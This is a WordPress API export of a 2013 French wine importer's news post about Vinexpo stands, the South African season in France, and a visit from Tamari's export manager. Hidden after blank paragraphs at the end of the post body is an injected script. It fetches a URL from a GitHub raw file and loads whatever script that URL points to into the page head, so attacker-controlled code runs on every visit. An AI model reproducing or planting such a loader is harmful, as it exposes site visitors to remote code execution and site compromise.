{"id":819,"date":"2013-06-17T07:05:46","date_gmt":"2013-06-17T06:05:46","guid":{"rendered":"http:\/\/continentduvin.fr\/?p=819"},"modified":"2024-10-29T15:13:11","modified_gmt":"2024-10-29T14:13:11","slug":"continent-du-vin-vin-expo-saison-africaine-tamari-en-france","status":"publish","type":"post","link":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/","title":{"rendered":"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France&#8230;"},"content":{"rendered":"<p>L&rsquo;actualit\u00e9 de Continent du Vin a \u00e9t\u00e9 assez dense ces derni\u00e8res semaines et promet de l&rsquo;\u00eatre les semaines \u00e0 venir:<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>VINEXPO:<\/strong><\/span><\/p>\n<p>Certains de nos producteurs seront pr\u00e9sents \u00e0 Vin Expo, nous vous encourageons \u00e0 venir leur rendre visite et par la m\u00eame occasion nous rendre visite- nous serons pr\u00e9sents sur les stands le lundi 17 Juin- Pour recevoir le meilleur accueil qui soit, venez de la part de Continent du Vin. Voici les producteurs pr\u00e9sents et les num\u00e9ros de stand:<\/p>\n<p>EMILIANA: HALL 1 STAND AB 18\/29<\/p>\n<p>LA RONCIERE: HALL 1 STAND AB 12\/16<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>SAISON SUD AFRICAINE EN FRANCE:<\/strong><\/span><\/p>\n<p>l&rsquo;Afrique du Sud est mise \u00e0 l&rsquo;honneur en France de Mai \u00e0 Novembre dans le cadre des saisons africaines en France- voire <a href=\"http:\/\/france-southafrica.com\/\">http:\/\/france-southafrica.com\/<\/a><\/p>\n<p>C&rsquo;est l&rsquo;occasion de vivre des centaines d&rsquo;\u00e9v\u00e8nement \u00e0 travers la France autour de la culture, du sport et de l&rsquo;art sud-africain.<\/p>\n<p><strong>Continent du Vin a \u00e9t\u00e9 choisi pour participer \u00e0 plusieurs de ces \u00e9v\u00e8nements notamment l&rsquo;inauguration qui a eu lieu en Mai dernier o\u00f9 les deux pr\u00e9sidents et plusieurs de leurs ministres \u00e9taient convi\u00e9s. En d\u00e9gustation ils ont pu d\u00e9couvrir, Fort Simon Chenin Blanc, Bellevue Atticus et Tumara, DuToitskloof Beaukett.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>TAMARI EN FRANCE:<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>Claudio Magni, responsable export de Tamari, \u00e9tait en tourn\u00e9e en Europe ces derniers jours et nous a fait l&rsquo;honneur de nous rendre visite les 13 et 14 juin. Cette rencontre a surtout \u00e9t\u00e9 pour nous l&rsquo;occasion de lui faire d\u00e9couvrir les particularismes du march\u00e9 fran\u00e7ais. Nous remercions au passage ceux d&rsquo;entre vous qui l&rsquo;ont re\u00e7u dans leurs caves ou restaurants.<\/p>\n<p>Claudio a pris toute la mesure de la notion de march\u00e9 niche pour les vins du nouveau monde en France et nous a apport\u00e9 tous son soutien quant a l&rsquo;avenir de notre collaboration exclusive en France.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&rsquo;actualit\u00e9 de Continent du Vin a \u00e9t\u00e9 assez dense ces derni\u00e8res semaines et promet de l&rsquo;\u00eatre les semaines \u00e0 venir: VINEXPO: Certains de nos producteurs seront pr\u00e9sents \u00e0 Vin Expo, nous vous encourageons \u00e0 venir leur rendre visite et par la m\u00eame occasion nous rendre visite- nous serons pr\u00e9sents sur les stands le lundi 17 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":820,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_lmt_disableupdate":"no","_lmt_disable":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[13],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -\" \/>\n<meta property=\"og:description\" content=\"L&rsquo;actualit\u00e9 de Continent du Vin a \u00e9t\u00e9 assez dense ces derni\u00e8res semaines et promet de l&rsquo;\u00eatre les semaines \u00e0 venir: VINEXPO: Certains de nos producteurs seront pr\u00e9sents \u00e0 Vin Expo, nous vous encourageons \u00e0 venir leur rendre visite et par la m\u00eame occasion nous rendre visite- nous serons pr\u00e9sents sur les stands le lundi 17 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/ContinentDuVin\/\" \/>\n<meta property=\"article:published_time\" content=\"2013-06-17T06:05:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-29T14:13:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"720\" \/>\n\t<meta property=\"og:image:height\" content=\"480\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Continent du Vin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Continent du Vin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/\",\"name\":\"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -\",\"isPartOf\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg\",\"datePublished\":\"2013-06-17T06:05:46+00:00\",\"dateModified\":\"2024-10-29T14:13:11+00:00\",\"author\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\"},\"breadcrumb\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage\",\"url\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg\",\"contentUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg\",\"width\":720,\"height\":480},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France&#8230;\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\",\"name\":\"\",\"description\":\"Importateur de Vins du Monde depuis 2004\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\",\"name\":\"Continent du Vin\",\"description\":\"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+\",\"sameAs\":[\"http:\/\/www.continentduvin.fr\",\"https:\/\/www.facebook.com\/ContinentDuVin\/\"],\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/","og_locale":"fr_FR","og_type":"article","og_title":"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -","og_description":"L&rsquo;actualit\u00e9 de Continent du Vin a \u00e9t\u00e9 assez dense ces derni\u00e8res semaines et promet de l&rsquo;\u00eatre les semaines \u00e0 venir: VINEXPO: Certains de nos producteurs seront pr\u00e9sents \u00e0 Vin Expo, nous vous encourageons \u00e0 venir leur rendre visite et par la m\u00eame occasion nous rendre visite- nous serons pr\u00e9sents sur les stands le lundi 17 [&hellip;]","og_url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/","article_author":"https:\/\/www.facebook.com\/ContinentDuVin\/","article_published_time":"2013-06-17T06:05:46+00:00","article_modified_time":"2024-10-29T14:13:11+00:00","og_image":[{"width":720,"height":480,"url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg","type":"image\/jpeg"}],"author":"Continent du Vin","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Continent du Vin","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/","name":"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France... -","isPartOf":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website"},"primaryImageOfPage":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage"},"image":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage"},"thumbnailUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg","datePublished":"2013-06-17T06:05:46+00:00","dateModified":"2024-10-29T14:13:11+00:00","author":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc"},"breadcrumb":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#primaryimage","url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg","contentUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2013\/06\/drapeau-sud-af.jpg","width":720,"height":480},{"@type":"BreadcrumbList","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/continent-du-vin-vin-expo-saison-africaine-tamari-en-france\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/"},{"@type":"ListItem","position":2,"name":"CONTINENT DU VIN: Vin Expo, Saison Africaine, Tamari en France&#8230;"}]},{"@type":"WebSite","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/","name":"","description":"Importateur de Vins du Monde depuis 2004","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc","name":"Continent du Vin","description":"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+","sameAs":["http:\/\/www.continentduvin.fr","https:\/\/www.facebook.com\/ContinentDuVin\/"],"url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/"}]}},"modified_by":"Continent du Vin","_links":{"self":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/819"}],"collection":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/comments?post=819"}],"version-history":[{"count":1,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/819\/revisions"}],"predecessor-version":[{"id":15028,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/819\/revisions\/15028"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media\/820"}],"wp:attachment":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media?parent=819"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/categories?post=819"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/tags?post=819"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}